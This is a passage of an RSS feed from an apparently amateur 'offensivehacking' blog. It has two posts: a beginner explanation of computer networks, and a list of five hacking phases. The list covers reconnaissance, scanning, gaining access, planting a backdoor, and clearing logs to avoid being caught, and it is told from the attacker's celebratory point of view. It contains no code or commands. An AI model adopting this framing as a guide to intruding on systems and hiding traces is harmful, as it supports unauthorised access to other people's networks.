					<description><![CDATA[Wassup Guys??? Doing great??????(Hope so) 😉 I know the post title seems to be little kiddish but still one needs to refresh the knowledge before we proceed(for those who know what is network)! If you are unfamiliar with network, this is a good post to start with(for those who dont know what network is)! 🙂 &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2012/10/05/what-is-a-computer-network/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Wassup Guys??? Doing great??????(Hope so) <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>I know the post title seems to be little kiddish but still one needs to refresh the knowledge before we proceed(for those who know what is network)! If you are unfamiliar with network, this is a good post to start with(for those who dont know what network is)! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So lets rock n roll&#8230;with NETWORK!!!! B)</p>
<p>Now to put simply, A network is a link or connection between two or more computers(also called as nodes) for sharing resources and exchange of data!!!</p>
<p>Quite obviously, there must be some path between the two which we refer to it as,the physical medium..eg..wires, telephone lines, radio waves, satellites, or infrared light beams,etc,etc,etc&#8230;..</p>
<p>So a simple schematic diagram of a network can be as follows:&#8212;&gt;</p>
<p>&nbsp;</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/2-300x294.gif"><img loading="lazy" data-attachment-id="39" data-permalink="https://offensivehacking.wordpress.com/2012/10/05/what-is-a-computer-network/2-300x294/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/2-300x294.gif" data-orig-size="300,294" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="2-300&amp;#215;294" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/2-300x294.gif?w=300" class="alignnone  wp-image-39" title="2-300x294" src="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/2-300x294.gif?w=516&#038;h=346" alt="" width="516" height="346" /></a></p>
<p>&nbsp;</p>
<p>As simple as that! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Don&#8217;t worry about the central machine you see in the diagram, we will be coming to that very shortly! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So that is for this post, we will see classification of network depending upon size and architecture in next post, till then&#8230;good bye&#8230;and hope to see you soon! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2012/10/05/what-is-a-computer-network/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">38</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/2-300x294.gif" medium="image">
			<media:title type="html">2-300x294</media:title>
		</media:content>
	</item>
		<item>
		<title>FIVE PHASES OF HACKING</title>
		<link>https://offensivehacking.wordpress.com/2012/10/02/five-phases-of-hacking/</link>
					<comments>https://offensivehacking.wordpress.com/2012/10/02/five-phases-of-hacking/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Tue, 02 Oct 2012 06:02:30 +0000</pubDate>
				<category><![CDATA[INTRODUCTION]]></category>
		<category><![CDATA[HACKER]]></category>
		<category><![CDATA[HACKING]]></category>
		<category><![CDATA[PHASES]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=23</guid>

					<description><![CDATA[HERE ARE THE PHASES OF HACKING WHICH HACKER MUST FOLLOW TO IMPLEMENT A SUCCESSFUL ATTACK! THE MORE YOU GET CLOSE TO ALL PHASES,THE MORE STEALTH WILL BE YOUR YOUR ATTACK PHASES OF HACKING: 1.  RECONNAISSANCE : THIS IS THE PRIMARY PHASE WHERE THE HACKER  TRIES TO COLLECT AS MUCH INFORMATION AS POSSIBLE ABOUT THE TARGET. &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2012/10/02/five-phases-of-hacking/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/hackingphases.jpg"><img loading="lazy" title="Hacking Phases" src="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/hackingphases.jpg?w=300&#038;h=281" alt="" width="300" height="281" /></a><br />
HERE ARE THE PHASES OF HACKING WHICH HACKER MUST FOLLOW TO IMPLEMENT A SUCCESSFUL ATTACK!</p>
<p>THE MORE YOU GET CLOSE TO ALL PHASES,THE MORE STEALTH WILL BE YOUR YOUR ATTACK</p>
<p>PHASES OF HACKING:</p>
<p>1.  RECONNAISSANCE : THIS IS THE PRIMARY PHASE WHERE THE HACKER  TRIES TO COLLECT AS MUCH INFORMATION AS POSSIBLE ABOUT THE TARGET. IT INCLUDES IDENTIFYING THE TARGET,FINDING OUT THE TARGET IP ADDRESS RANGE,NETWORK,DOMAIN NAME REGISTRATION RECORDS OF THE TARGET,MAIL SERVER RECORDS,DNS RECORDS ,ETC,ETC&#8230;&#8230;.</p>
<p>2. SCANNING: THIS MAKES UP THE BASE OF HACKING! THIS IS WHERE PLANNING FOR ATTACK ACTUALLY BEGINS! AFTER RECONNAISSANCE THE ATTACKER SCANS THE TARGET FOR SERVICES RUNNING,OPEN PORTS,FIREWALL DETECTION,FINDING OUT VULNERABILITIES,OPERATING SYSTEM DETECTION,ETC&#8230;ETC&#8230;.</p>
<p>3.GAINING ACCESS: AFTER SCANNING,THE HACKERS DESIGNS THE BLUEPRINT OF THE NETWORK OF THE TARGET WITH THE HELP OF STUFFS COLLECTED DURING PHASES 1 AND 2! NOW THE ATTACKER EXECUTES THE ATTACK BASED ON THE VULNERABILITIES WHICH WERE IDENTIFIED DURING SCANNING! AFTER THE SUCCESSFUL ATTACK,HE GETS ACCESS TO THE TARGET NETWORK!!!! whoaaaaaaaaaaaaaaaa!! HE IS NOW,THE KING!!! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /><br />
4.MAINTAINING ACCESS: AFTER GAINING ACCESS,THE ATTACKER ESCALATES THE PRIVILEGES TO ROOT/ADMIN AND UPLOADS A PIECE OF CODE(USUALLY CALLED AS BACKDOOR) ON THE TARGET NETWORK SO THAT HE ALWAYS MAINTAIN THE GAINED ACCESS AND CAN CONNECT TO TARGET ANYTIME! B)</p>
<p>5.COVERING TRACK: AFTER GAINING ACCESS AND MAINTAINING THE SAME, HACKER EXPLOITS THE WEAKNESS AND HACKS THE NETWORK OR MISUSES THE ACCESS! AFTER THAT, COMES THE IMPORTANT PHASE&#8212;&gt; COVERING THE TRACKS! TO AVOID GETTING TRACED AND CAUGHT,HACKER CLEARS ALL THE TRACKS BY CLEARING ALL KINDS OF LOGS AND DELETED THE UPLOADED BACKDOOR AND  ANYTHING RELATED STUFF WHICH MAY LATER REFLECT HIS PRESENCE!</p>
<p>SO THESE ARE FIVE IMPORTANT PHASES OF HACKING&#8230;.WHICH EVERY HACKER MUST FOLLOW FOR A SUCCESSFUL ATTACK!</p>
<p>COMING WITH MORE TUTORIALS SOON&#8230;&#8230;&#8230;&#8230;</p>
<p><img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2012/10/02/five-phases-of-hacking/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">23</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2012/10/hackingphases.jpg?w=300" medium="image">
			<media:title type="html">Hacking Phases</media:title>
		</media:content>
	</item>
	</channel>
</rss>
